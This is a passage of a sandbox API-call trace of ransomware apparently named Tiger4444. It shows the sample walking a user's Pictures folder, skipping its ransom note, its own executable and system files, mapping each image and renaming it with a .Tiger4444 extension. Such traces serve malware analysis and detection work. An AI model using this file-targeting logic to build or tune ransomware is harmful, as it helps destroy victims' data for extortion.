cFileName="ugR0riRG8ulCowNjMAqj.jpg", cAlternateFileName="UGR0RI~1.JPG")) returned 1 [0045.705] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.705] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="Tiger4444.exe") returned 1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2=".") returned 1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="..") returned 1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="windows") returned -1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="bootmgr") returned 1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="pagefile.sys") returned 1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="boot") returned 1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="ids.txt") returned 1 [0045.706] lstrcmpiW (lpString1="ugR0riRG8ulCowNjMAqj.jpg", lpString2="NTUSER.DAT") returned 1 [0045.706] lstrcpyW (in: lpString1=0x30aeada, lpString2="ugR0riRG8ulCowNjMAqj.jpg" | out: lpString1="ugR0riRG8ulCowNjMAqj.jpg") returned="ugR0riRG8ulCowNjMAqj.jpg" [0045.706] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ugR0riRG8ulCowNjMAqj.jpg", dwFileAttributes=0x0) returned 1 [0045.706] lstrlenW (lpString="ugR0riRG8ulCowNjMAqj.jpg") returned 24 [0045.706] lstrlenW (lpString="Tiger4444") returned 9 [0045.706] lstrcmpiW (lpString1="jMAqj.jpg", lpString2="Tiger4444") returned -1 [0045.706] lstrlenW (lpString=".dll") returned 4 [0045.706] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.706] lstrlenW (lpString=".lnk") returned 4 [0045.706] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.706] lstrlenW (lpString=".ini") returned 4 [0045.706] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.706] lstrlenW (lpString=".sys") returned 4 [0045.706] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.706] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ugR0riRG8ulCowNjMAqj.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ugr0rirg8ulcownjmaqj.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.706] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.707] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13715963238) returned 1 [0045.707] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=63403) returned 1 [0045.707] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0045.707] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0045.707] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfab0, lpName=0x0) returned 0x2c8 [0045.707] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfab0) returned 0xbe0000 [0045.708] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.708] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.708] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.708] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.708] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.709] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.709] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.709] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.709] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13716187647) returned 1 [0045.709] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0045.709] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0045.709] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.709] CloseHandle (hObject=0x2c8) returned 1 [0045.709] CloseHandle (hObject=0x260) returned 1 [0045.716] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\ugR0riRG8ulCowNjMAqj.jpg.Tiger4444") returned 59 [0045.716] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\ugR0riRG8ulCowNjMAqj.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ugr0rirg8ulcownjmaqj.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\ugR0riRG8ulCowNjMAqj.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\ugr0rirg8ulcownjmaqj.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.716] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=63408 | out: Addend=0xc6f980) returned 18321888 [0045.716] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4529 [0045.716] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19b6cb0, ftCreationTime.dwHighDateTime=0x1d4cb12, ftLastAccessTime.dwLowDateTime=0x81d6afa0, ftLastAccessTime.dwHighDateTime=0x1d4d2ae, ftLastWriteTime.dwLowDateTime=0x81d6afa0, ftLastWriteTime.dwHighDateTime=0x1d4d2ae, nFileSizeHigh=0x0, nFileSizeLow=0xbbf5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xAWhA3CWoiGQ4.bmp", cAlternateFileName="XAWHA3~1.BMP")) returned 1 [0045.716] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.716] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.716] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="Tiger4444.exe") returned 1 [0045.716] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2=".") returned 1 [0045.717] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="..") returned 1 [0045.717] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="windows") returned 1 [0045.717] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="bootmgr") returned 1 [0045.717] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="pagefile.sys") returned 1 [0045.717] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="boot") returned 1 [0045.717] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="ids.txt") returned 1 [0045.717] lstrcmpiW (lpString1="xAWhA3CWoiGQ4.bmp", lpString2="NTUSER.DAT") returned 1 [0045.717] lstrcpyW (in: lpString1=0x30aeada, lpString2="xAWhA3CWoiGQ4.bmp" | out: lpString1="xAWhA3CWoiGQ4.bmp") returned="xAWhA3CWoiGQ4.bmp" [0045.717] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\xAWhA3CWoiGQ4.bmp", dwFileAttributes=0x0) returned 1 [0045.717] lstrlenW (lpString="xAWhA3CWoiGQ4.bmp") returned 17 [0045.717] lstrlenW (lpString="Tiger4444") returned 9 [0045.717] lstrcmpiW (lpString1="oiGQ4.bmp", lpString2="Tiger4444") returned -1 [0045.717] lstrlenW (lpString=".dll") returned 4 [0045.717] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.717] lstrlenW (lpString=".lnk") returned 4 [0045.717] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.717] lstrlenW (lpString=".ini") returned 4 [0045.717] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.717] lstrlenW (lpString=".sys") returned 4 [0045.717] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.717] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\xAWhA3CWoiGQ4.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\xawha3cwoigq4.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.717] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.717] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13717053553) returned 1 [0045.717] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=48117) returned 1 [0045.718] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0045.718] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0045.718] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf00, lpName=0x0) returned 0x2c8 [0045.718] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf00) returned 0xbe0000 [0045.719] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.719] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.719] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.719] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.719] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.719] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.719] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.719] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.719] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13717229761) returned 1 [0045.719] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0045.719] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0045.719] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.720] CloseHandle (hObject=0x2c8) returned 1 [0045.720] CloseHandle (hObject=0x260) returned 1 [0045.722] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\xAWhA3CWoiGQ4.bmp.Tiger4444") returned 52 [0045.722] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\xAWhA3CWoiGQ4.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\xawha3cwoigq4.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\xAWhA3CWoiGQ4.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\xawha3cwoigq4.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.722] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=48128 | out: Addend=0xc6f980) returned 18385296 [0045.722] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4531 [0045.722] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a6b5ee0, ftCreationTime.dwHighDateTime=0x1d4c9f7, ftLastAccessTime.dwLowDateTime=0x40464f40, ftLastAccessTime.dwHighDateTime=0x1d4d19c, ftLastWriteTime.dwLowDateTime=0x40464f40, ftLastWriteTime.dwHighDateTime=0x1d4d19c, nFileSizeHigh=0x0, nFileSizeLow=0xa36f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xs85b.gif", cAlternateFileName="")) returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2="Tiger4444.exe") returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2=".") returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2="..") returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2="windows") returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2="bootmgr") returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2="pagefile.sys") returned 1 [0045.722] lstrcmpiW (lpString1="Xs85b.gif", lpString2="boot") returned 1 [0045.723] lstrcmpiW (lpString1="Xs85b.gif", lpString2="ids.txt") returned 1 [0045.723] lstrcmpiW (lpString1="Xs85b.gif", lpString2="NTUSER.DAT") returned 1 [0045.723] lstrcpyW (in: lpString1=0x30aeada, lpString2="Xs85b.gif" | out: lpString1="Xs85b.gif") returned="Xs85b.gif" [0045.723] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xs85b.gif", dwFileAttributes=0x0) returned 1 [0045.723] lstrlenW (lpString="Xs85b.gif") returned 9 [0045.723] lstrlenW (lpString="Tiger4444") returned 9 [0045.723] lstrcmpiW (lpString1="Xs85b.gif", lpString2="Tiger4444") returned 1 [0045.723] lstrlenW (lpString=".dll") returned 4 [0045.723] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.723] lstrlenW (lpString=".lnk") returned 4 [0045.723] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.723] lstrlenW (lpString=".ini") returned 4 [0045.723] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.723] lstrlenW (lpString=".sys") returned 4 [0045.723] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.723] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xs85b.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\xs85b.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.723] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.723] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13717631528) returned 1 [0045.723] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=41839) returned 1 [0045.723] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0045.723] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0045.723] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa670, lpName=0x0) returned 0x2c8 [0045.723] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa670) returned 0xbe0000 [0045.724] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.724] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.724] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.725] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.725] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.725] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.725] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.725] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.725] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13717798900) returned 1 [0045.725] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0045.725] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0045.725] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.725] CloseHandle (hObject=0x2c8) returned 1 [0045.725] CloseHandle (hObject=0x260) returned 1 [0045.727] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\Xs85b.gif.Tiger4444") returned 44 [0045.727] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Xs85b.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\xs85b.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Xs85b.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\xs85b.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.728] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=41840 | out: Addend=0xc6f980) returned 18433424 [0045.728] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4532 [0045.728] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fec6b70, ftCreationTime.dwHighDateTime=0x1d4d17a, ftLastAccessTime.dwLowDateTime=0x86729970, ftLastAccessTime.dwHighDateTime=0x1d4d1ff, ftLastWriteTime.dwLowDateTime=0x86729970, ftLastWriteTime.dwHighDateTime=0x1d4d1ff, nFileSizeHigh=0x0, nFileSizeLow=0xe491, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YJvAER.gif", cAlternateFileName="")) returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="Tiger4444.exe") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2=".") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="..") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="windows") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="bootmgr") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="pagefile.sys") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="boot") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="ids.txt") returned 1 [0045.728] lstrcmpiW (lpString1="YJvAER.gif", lpString2="NTUSER.DAT") returned 1 [0045.728] lstrcpyW (in: lpString1=0x30aeada, lpString2="YJvAER.gif" | out: lpString1="YJvAER.gif") returned="YJvAER.gif" [0045.728] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YJvAER.gif", dwFileAttributes=0x0) returned 1 [0045.728] lstrlenW (lpString="YJvAER.gif") returned 10 [0045.728] lstrlenW (lpString="Tiger4444") returned 9 [0045.728] lstrcmpiW (lpString1="JvAER.gif", lpString2="Tiger4444") returned -1 [0045.728] lstrlenW (lpString=".dll") returned 4 [0045.729] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.729] lstrlenW (lpString=".lnk") returned 4 [0045.729] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.729] lstrlenW (lpString=".ini") returned 4 [0045.729] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.729] lstrlenW (lpString=".sys") returned 4 [0045.729] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.729] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YJvAER.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yjvaer.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.729] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.729] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13718193612) returned 1 [0045.729] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=58513) returned 1 [0045.729] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.729] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0045.729] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe7a0, lpName=0x0) returned 0x2c8 [0045.729] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe7a0) returned 0xbe0000 [0045.730] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.730] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.730] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.730] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.731] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.731] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.731] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.731] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.731] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13718398379) returned 1 [0045.731] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.731] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0045.731] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.732] CloseHandle (hObject=0x2c8) returned 1 [0045.732] CloseHandle (hObject=0x260) returned 1 [0045.733] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\YJvAER.gif.Tiger4444") returned 45 [0045.734] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\YJvAER.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yjvaer.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\YJvAER.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\yjvaer.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.734] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=58528 | out: Addend=0xc6f980) returned 18475264 [0045.734] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4533 [0045.734] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba3fe10, ftCreationTime.dwHighDateTime=0x1d4ce1e, ftLastAccessTime.dwLowDateTime=0xd48362a0, ftLastAccessTime.dwHighDateTime=0x1d4cc2a, ftLastWriteTime.dwLowDateTime=0xd48362a0, ftLastWriteTime.dwHighDateTime=0x1d4cc2a, nFileSizeHigh=0x0, nFileSizeLow=0x33ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zkGa22a5xC9Cll9U.gif", cAlternateFileName="ZKGA22~1.GIF")) returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="Tiger4444.exe") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2=".") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="..") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="windows") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="bootmgr") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="pagefile.sys") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="boot") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="ids.txt") returned 1 [0045.734] lstrcmpiW (lpString1="zkGa22a5xC9Cll9U.gif", lpString2="NTUSER.DAT") returned 1 [0045.734] lstrcpyW (in: lpString1=0x30aeada, lpString2="zkGa22a5xC9Cll9U.gif" | out: lpString1="zkGa22a5xC9Cll9U.gif") returned="zkGa22a5xC9Cll9U.gif" [0045.734] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\zkGa22a5xC9Cll9U.gif", dwFileAttributes=0x0) returned 1 [0045.735] lstrlenW (lpString="zkGa22a5xC9Cll9U.gif") returned 20 [0045.735] lstrlenW (lpString="Tiger4444") returned 9 [0045.735] lstrcmpiW (lpString1="Cll9U.gif", lpString2="Tiger4444") returned -1 [0045.735] lstrlenW (lpString=".dll") returned 4 [0045.735] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.735] lstrlenW (lpString=".lnk") returned 4 [0045.735] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.735] lstrlenW (lpString=".ini") returned 4 [0045.735] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.735] lstrlenW (lpString=".sys") returned 4 [0045.735] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\zkGa22a5xC9Cll9U.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\zkga22a5xc9cll9u.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.735] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.735] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13718819163) returned 1 [0045.735] 